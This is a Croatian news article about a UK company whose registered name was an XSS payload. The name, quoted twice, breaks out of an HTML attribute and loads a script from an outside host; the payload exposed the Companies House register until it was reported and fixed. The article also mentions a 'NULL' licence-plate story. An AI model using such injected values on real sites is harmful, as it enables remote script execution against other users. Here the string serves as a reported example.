Za naziv tvrtke stavio HTML skriptu pa zapao u probleme
Jedan je Britanac svoju tvrtku, u trenutku inspiracije, nazvao tako da njezino ime izgleda kao HTML skripta, čime je izložio državni registar opasnosti od hakiranja. Bio je prisiljen promijeniti ime
Možda ste već čuli kako je jedan Amerikanac prošle godine pokušao "hakirati" sustav koji bilježi kazne za prometne prekršaje tako što je za registracijsku pločicu svojeg automobila odabrao natpis NULL. Smatrao je da će, ako ga prometne kamere snime u prekršaju, ovaj zapis protumačiti kao prazno polje u bazi podataka, te da tako neće dobiti kaznu. No, prevario se – sustav je upravo njemu pripisao sve prometne prekršaje koji su u policijskoj bazi imali NULL zapis (zbog lošeg automatskog očitanja registracije, na primjer), pa je u kratkom vremenu prikupio oko 12.000 dolara tuđih prometnih kazni.
Šaljivi vlasnik i mogući problemi
Slična sudbina zatekla je nedavno i Britanca koji je u šali svoju tvrtku nazvao koristeći HTML tagove: “><SCRIPT SRC=HTTPS://MJT.XSS.HT> LTD. Ovakvo ime, smatrao je, bit će zabavno za njegovu konzultantsku tvrtku, no nije niti slutio da bi time mogao ugroziti britanski registar tvrtki Companies House.
Ova organizacija je, naime, bila podložna hakerskom napadu na web aplikacije poznatome kao cross-site scripting. Unos ovog neobičnog imena malenog poduzeća u bazu podataka otvorio je web tog registra napadačima koji su potom mogli iskoristiti propust i na njihovom webu aktivirati vanjske (potencijalno opasne) HTML skripte.
Propust je otkrio sam vlasnik sporne tvrtke, i odmah potom je obavijestio kako spomenuti nacionalni registar, tako i službe nadležne za kibernetičku sigurnost i održavanje digitalnih usluga Ujedinjenog Kraljevstva. Nakon što je potvrđeno da ime “><SCRIPT SRC=HTTPS://MJT.XSS.HT> LTD može prouzročiti sigurnosne probleme, registar Companies House naredio je da se ono odmah promijeni. Poručili su pritom i da su poduzeli korake da ovakve skripte u budućnosti ne mogu dovesti njihov registar u opasnost od hakiranja.
Vlasnik tvrtke problematičnog imena odlučio je promijeniti ga, ne odustajući od svoje šale, u: THAT COMPANY WHOSE NAME USED TO CONTAIN HTML SCRIPT TAGS LTD (Ona kompanija čije ime je sadržavalo tagove HTML skripte d.o.o.).
